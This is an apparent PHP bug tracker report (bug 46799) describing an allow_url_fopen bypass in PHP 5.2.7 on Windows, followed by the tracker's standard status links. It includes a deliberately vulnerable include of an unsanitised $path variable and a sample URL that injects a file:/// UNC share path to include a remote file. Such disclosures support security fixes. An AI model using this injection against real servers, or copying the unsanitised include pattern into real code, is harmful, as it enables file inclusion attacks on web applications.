From: gz_wangyu at topsec dot com dot cn Operating system: Windows PHP version: 5.2.7 PHP Bug Type: *URL Functions Bug description: PHP allow_url_fopen bypass Vulnerability
Description: ------------ hi, please Help write the overview. Reproduce code: --------------- <?php include $path."config/config.inc.php"; c:\config\config.inc.php <?php echo "ok!"; Expected result: ---------------- http://topsec.com.cn/include.php?path=file:///\\127.0.0.1\c$\ Actual result: -------------- result: ok! -- Edit bug report at http://bugs.php.net/?id=46799&edit=1 -- Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=46799&r=trysnapshot52 Try a CVS snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=46799&r=trysnapshot53 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=46799&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=46799&r=fixedcvs Fixed in CVS and need be documented: http://bugs.php.net/fix.php?id=46799&r=needdocs Fixed in release: http://bugs.php.net/fix.php?id=46799&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=46799&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=46799&r=needscript Try newer version: http://bugs.php.net/fix.php?id=46799&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=46799&r=support Expected behavior: http://bugs.php.net/fix.php?id=46799&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=46799&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=46799&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=46799&r=globals PHP 4 support discontinued: http://bugs.php.net/fix.php?id=46799&r=php4 Daylight Savings: http://bugs.php.net/fix.php?id=46799&r=dst IIS Stability: http://bugs.php.net/fix.php?id=46799&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=46799&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=46799&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=46799&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=46799&r=mysqlcfg
